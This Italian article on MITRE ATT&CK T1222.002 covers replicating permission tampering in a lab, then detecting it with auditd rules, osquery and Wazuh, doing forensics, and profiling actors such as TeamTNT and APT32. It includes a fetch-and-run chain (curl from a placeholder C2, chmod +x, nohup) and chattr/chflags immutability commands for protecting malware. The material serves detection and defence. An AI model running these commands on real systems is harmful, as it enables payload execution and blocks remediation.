Permessi sotto Attacco: Linux and Mac File and Directory Permissions Modification (T1222.002)

In un esercizio red team, la manipolazione dei permessi non è mai la tecnica principale ma è il collante che tiene insieme la catena d'attacco. Un payload scaricato non è pericoloso finché non diventa eseguibile, e un file di configurazione non è un vettore di persistenza finché l'attaccante non può scriverci. Vediamo come replicare le procedure documentate in laboratorio.

La catena più classica parte dal download di un secondo stadio e dalla sua attivazione. Questo è esattamente il pattern usato nella campagna KV Botnet Activity (C0035), dove i payload scaricati su dispositivi SOHO venivano resi eseguibili prima del lancio:

curl -o /tmp/.update -s <indirizzo-C2>/payload chmod +x /tmp/.update nohup /tmp/.update &

Per simulare il comportamento di OSX/Shlayer su macOS, che applica permessi estremamente permissivi, si può usare:

chmod 777 /tmp/stage2.bin

Nota la differenza: chmod +x aggiunge solo il bit di esecuzione mantenendo gli altri permessi, mentre chmod 777 spalanca lettura, scrittura ed esecuzione a tutti — una scelta rumorosa ma efficace se l'attaccante non si preoccupa della stealth.

Per replicare la tecnica di Rocke e TeamTNT, che usano chattr per rendere i file immutabili e impedire la remediation, il comando è:

chattr +i /usr/bin/.malware

L'attributo immutabile impedisce la cancellazione o modifica del file anche a root, a meno che non venga prima rimosso l'attributo con chattr -i. Per verificare lo stato degli attributi estesi si usa:

lsattr /usr/bin/.malware

Su macOS, il comando equivalente è chflags con il flag uchg (user immutable) o schg (system immutable, richiede single-user mode). Per simulare un attacco che protegge un binario dalla rimozione:

chflags uchg /Users/Shared/AppStore.app/Contents/MacOS/payload

Il pattern di APT32 merita attenzione: il backdoor macOS OSX_OCEANLOTUS.D imposta i permessi a 755 (rwxr-xr-x) — una scelta più chirurgica che non attira l'attenzione come un 777. In laboratorio:

chmod 755 /Users/Shared/AppStore.app

Per la manipolazione del GID come documentato per COATHANGER, che impostava il GID del processo httpsd a 90 su apparati Fortinet compromessi, si simula con:

chown :90 /path/to/httpsd

Un tool utile per automatizzare queste catene in esercizi purple team è Atomic Red Team (open source), che include test atomici specifici per T1222.002 eseguibili con un singolo comando tramite il modulo Invoke-AtomicTest.

Il problema centrale della detection di questa tecnica è il rapporto segnale-rumore: chmod e chown vengono eseguiti centinaia di volte al giorno da script di deploy, package manager e processi di sistema. Un alert su ogni invocazione è inutilizzabile. La chiave è filtrare per contesto.

Su Linux, la fonte primaria è auditd (open source). Le regole audit devono monitorare le syscall chmod, fchmod, chown, fchown e setxattr, ma filtrate per path critici. Una regola efficace per i percorsi sensibili:

-a always,exit -F arch=b64 -S chmod,fchmod,fchmodat -F dir=/etc -F perm=xa -k perm_mod_etc -a always,exit -F arch=b64 -S chmod,fchmod,fchmodat -F dir=/usr/bin -F perm=xa -k perm_mod_bin

Per intercettare l'uso di chattr — il pattern di TeamTNT e Rocke — serve una regola specifica sulla creazione del processo:

-a always,exit -F arch=b64 -S execve -F exe=/usr/bin/chattr -k chattr_usage

I log auditd generano record SYSCALL e PROCTITLE che contengono rispettivamente il contesto della syscall e la riga di comando completa. Il campo PROCTITLE è particolarmente prezioso perché mostra gli argomenti passati al comando.

Su macOS, le fonti sono tre: Unified Log, FSEvents e OpenBSM Audit Trail. L'Unified Log cattura eventi ad alto livello di esecuzione processi, mentre OpenBSM fornisce dettaglio granulare sulle syscall. Per monitorare la rimozione dell'attributo di quarantena (usato da XCSSET, Bundlore e OSX/Shlayer per bypassare Gatekeeper), il focus va sull'extended attribute com.apple.quarantine:

log show --predicate 'process == "xattr" AND eventMessage CONTAINS "com.apple.quarantine"' --last 1h

Per il tuning dei falsi positivi, la strategia raccomandata dalla detection strategy DET0351 è multilivello. I valori ottali da considerare sospetti come default sono 777, 755 in contesti non di deploy, e soprattutto 4755, 2755, 1755 che impostano i bit setuid, setgid e sticky. I path critici da monitorare con priorità alta includono /etc, /usr/bin, /usr/sbin, /var, /opt, /root e /boot.

La correlazione temporale è il moltiplicatore di efficacia: un chmod +x seguito entro 300 secondi dall'esecuzione del file modificato è un pattern comportamentale ad alta confidenza. Integrando i log auditd con osquery (open source) tramite la tabella process_events, si può costruire una query che correla le due azioni e genera alert solo quando la sequenza completa si verifica. Lo strumento Wazuh (open source) offre regole preconfigurate per il monitoraggio di integrità dei file (FIM) che possono essere affinate per questa tecnica specifica.

L'analisi forense della manipolazione dei permessi su sistemi Unix-like richiede di intrecciare più fonti di artefatti, perché nessuna singola fonte racconta la storia completa. L'obiettivo è ricostruire non solo cosa è stato modificato, ma quando, da chi e in quale sequenza rispetto ad altre azioni dell'attaccante.

Il punto di partenza su Linux è il log di auditd, se era configurato al momento dell'intrusione. I record SYSCALL contengono il timestamp, l'UID effettivo del processo chiamante, il percorso del file target e il valore dei permessi applicati. Il campo a1 nella syscall chmod contiene il valore ottale dei nuovi permessi in esadecimale (ad esempio, 0x1FF corrisponde a 777). Per estrarre tutti gli eventi di modifica permessi dal log audit:

ausearch -k perm_mod_etc --interpret

Se auditd non era attivo, gli artefatti si riducono drasticamente. I metadati del filesystem conservano solo i timestamp mtime, atime e ctime degli inode: la modifica dei permessi aggiorna il ctime (change time) ma non l'mtime. Questo è un indicatore prezioso: un file il cui ctime è posteriore all'mtime ha subito una modifica di metadati senza alterazione del contenuto, pattern tipico di un chmod o chown post-download.

Per estrarre questi timestamp su un'immagine forense, tool come Sleuth Kit (open source) offrono il comando istat che mostra tutti i timestamp dell'inode, incluso il ctime spesso ignorato dai tool di triage rapido. Su filesystem ext4, il campo aggiuntivo crtime (creation time) permette di distinguere ulteriormente tra file creati dall'attaccante e file di sistema modificati.

Su macOS, FSEvents rappresenta una fonte potente. Il database FSEvents registra modifiche al filesystem in modo asincrono e sopravvive al reboot. I record FSEvents relativi a modifiche di permessi contengono flag specifici come FN_Ext_Attr_Modified per le modifiche agli attributi estesi. Il tool fseventsparser (open source) di G-C Partners permette di parsare il database e filtrare per tipo di evento.

Per ricostruire la catena specifica di COATHANGER — che modificava il GID del binario httpsd a 90 — l'analista deve cercare nel filesystem i file il cui group ID non corrisponde ai valori standard del sistema. Il comando:

find / -gid 90 -ls

identifica tutti i file con GID anomalo. Analogamente, per individuare file resi immutabili come nella procedura di Rocke e TeamTNT:

lsattr -R / 2>/dev/null | grep "-i-"

La timeline finale dovrebbe correlare: il download del payload (log di rete o artefatti browser/curl), la modifica dei permessi (ctime/auditd), l'esecuzione (log processi/bash_history) e l'eventuale persistenza (modifica di file di configurazione shell o crontab). Il file .bash_history e gli equivalenti per altre shell spesso conservano i comandi chmod e chattr digitati interattivamente dall'attaccante, a meno che la history non sia stata disabilitata — un altro artefatto negativo da annotare nella timeline.

La manipolazione dei permessi su sistemi Unix-like attraversa tre profili di minaccia ben distinti, ciascuno con motivazioni, target e TTP complementari differenti.

TeamTNT (G0139) è il gruppo cryptomining più documentato degli ultimi anni, noto per colpire ambienti cloud e container Docker/Kubernetes esposti. L'uso di chattr +i per rendere immutabili i propri binari è una firma comportamentale ricorrente: l'obiettivo è impedire che strumenti di sicurezza o altri gruppi cryptomining concorrenti possano rimuovere il miner. TeamTNT combina questa tecnica con credential harvesting su cloud provider e lateral movement tramite chiavi SSH rubate. La modifica dei permessi è funzionale alla persistenza e alla difesa del territorio.

Rocke (G0106) condivide con TeamTNT lo spazio operativo del cryptomining ma si distingue per un approccio più orientato all'evasione. Il blocco dei permessi su file chiave serve a proteggere le modifiche apportate ai file di configurazione del sistema, impedendo il ripristino da parte degli amministratori. Il pattern è simile a TeamTNT, e storicamente i due gruppi hanno competuto per le stesse risorse compromesse.

APT32 (G0050), noto anche come OceanLotus, è un gruppo di spionaggio state-sponsored con focus sul Sud-Est asiatico. L'uso di chmod 755 nel backdoor macOS OSX_OCEANLOTUS.D è chirurgico: permessi sufficienti all'esecuzione ma non anomali in un contesto macOS, a differenza dei chmod 777 usati da malware commodity. Questo dettaglio rivela un livello di sofisticazione operativa superiore e una consapevolezza delle soglie di detection.

La campagna KV Botnet Activity (C0035), attribuita a Volt Typhoon, aggiunge una dimensione geopolitica significativa. Attiva da ottobre 2022 a gennaio 2024, ha compromesso dispositivi SOHO end-of-life di Cisco, NETGEAR e DrayTek per costruire un'infrastruttura di offuscamento della connettività verso vittime nei settori energia e telecomunicazioni, incluse entità nel territorio statunitense di Guam. La modifica dei permessi sui payload scaricati è un passaggio operativo necessario su dispositivi embedded Linux dove i file scaricati non hanno bit di esecuzione di default.

Il panorama software associato rafforza l'analisi. Tra i 10 software mappati, il pattern dominante è chmod +x o chmod 777 per abilitare l'esecuzione di payload — lo fanno Kinsing (cryptomining), Black Basta (ransomware), XCSSET e Bundlore (malware macOS), Dok (trojan macOS), Penquin (malware Linux attribuito a Turla), e P.A.S. Webshell (web shell PHP). La convergenza di attori così diversi su questa tecnica conferma che qualsiasi strategia difensiva che monitora i permessi su sistemi Unix-like copre un ampio spettro di minacce, dal commodity al top-tier.

Il trend emergente è l'espansione verso dispositivi IoT e SOHO, come dimostrato da C0035 e da COATHANGER (che modificava il GID su apparati Fortinet). Questi dispositivi spesso eseguono Linux embedded con logging minimale, rendendo la detection estremamente difficile e la manipolazione dei permessi un vettore a basso rischio per l'attaccante.

Framework MITRE ATT&CK: T1222.002, TA0005, G0139, G0106, G0050, S0352, S0598, S0599, S0402, S1105, S1070, S0281, S0658, S0587, S0482, C0035, M1022, M1026. Detection strategy DET0351 (AN0998, AN0999). Tool di detection: auditd, osquery (open source), Wazuh (open source), Sleuth Kit (open source), fseventsparser (open source), Atomic Red Team (open source). Integrato con conoscenza professionale per tool e procedure operative.